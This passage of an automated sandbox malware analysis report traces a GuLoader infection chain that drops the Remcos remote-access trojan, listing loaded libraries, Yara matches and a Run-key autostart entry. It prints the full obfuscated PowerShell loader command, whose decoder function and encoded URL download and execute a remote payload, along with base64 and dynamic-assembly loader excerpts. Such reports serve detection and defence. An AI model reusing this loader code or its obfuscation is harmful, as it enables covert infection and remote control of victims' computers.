              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: msi.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: version.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: msi.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: version.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeAutomated click: OK
              Source: C:\ProgramData\Remcos\remcos.exeAutomated click: OK
              Source: C:\ProgramData\Remcos\remcos.exeAutomated click: OK
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: msiexec.pdb source: msiexec.exe, msiexec.exe, 00000008.00000003.2717481925.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, remcos.exe
              Source: Binary string: msiexec.pdbGCTL source: msiexec.exe, 00000008.00000003.2717481925.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2612607332.0000000007E10000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2244688991.00000263E8771000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2248116940.00000263E8971000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdbvs source: powershell.exe, 00000004.00000002.2606853141.0000000006DC2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb52G source: powershell.exe, 00000004.00000002.2606853141.0000000006D81000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.2606853141.0000000006D81000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("powershell", ""echo $Sarcosome; function Relationsdat", "", "", "0");
              Yara detected GuLoader
              Source: Yara matchFile source: 00000004.00000002.2613657246.000000000BA9B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2613266468.00000000080C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2599993582.000000000549C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2406245717.0000018221C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Inquietudes)$gLoBal:ApraxIa226 = [SysTem.TEXt.enCoDinG]::AsciI.getstring($puistIe)$GlOBAl:metaLoPh=$aPraXiA226.substrINg($toXiheMia,$hOubArA186)<#Sekstendedelsnoderne Centralkommunes
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Paadragendes $Guaiacs $Afpolitiseret), (Foran @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Abscessen = [AppDomain]::CurrentDomain.GetAssemblies()$global
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Rubs)), $fremadrettede).DefineDynamicModule($Inspektrice, $false).DefineType($straffene, $standardvrdi, [System.MulticastDelegate])$Me
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Inquietudes)$gLoBal:ApraxIa226 = [SysTem.TEXt.enCoDinG]::AsciI.getstring($puistIe)$GlOBAl:metaLoPh=$aPraXiA226.substrINg($toXiheMia,$hOubArA186)<#Sekstendedelsnoderne Centralkommunes
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cer
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cer
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cerJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 10_2_00388ADC Sleep,LoadLibraryW,GetProcAddress,10_2_00388ADC
              Source: remcos.exe.8.drStatic PE information: section name: .didat
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34645243 push eax; ret 2_2_00007FFD34645241
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD346451F5 push eax; ret 2_2_00007FFD34645241
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34642315 pushad ; iretd 2_2_00007FFD3464232D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_027832D2 pushfd ; ret 4_2_027832E1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0278369D push ebx; iretd 4_2_027836DA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0278D75E pushad ; ret 4_2_0278D761
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0278DA0C pushfd ; ret 4_2_0278DA0D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_3_00CBFBBD push ecx; ret 8_3_00CBFBD0
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 10_2_00389F2D push ecx; ret 10_2_00389F40
              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\ProgramData\Remcos\remcos.exeJump to dropped file
              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\ProgramData\Remcos\remcos.exeJump to dropped file

              Boot Survival

              barindex
              Creates autostart registry keys with suspicious names
              Source: C:\Windows\SysWOW64\msiexec.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-BNP8POJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 10_2_00387DD0 StartServiceCtrlDispatcherW,GetLastError,10_2_00387DD0
              Source: C:\Windows\SysWOW64\msiexec.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-BNP8POJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-BNP8POJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
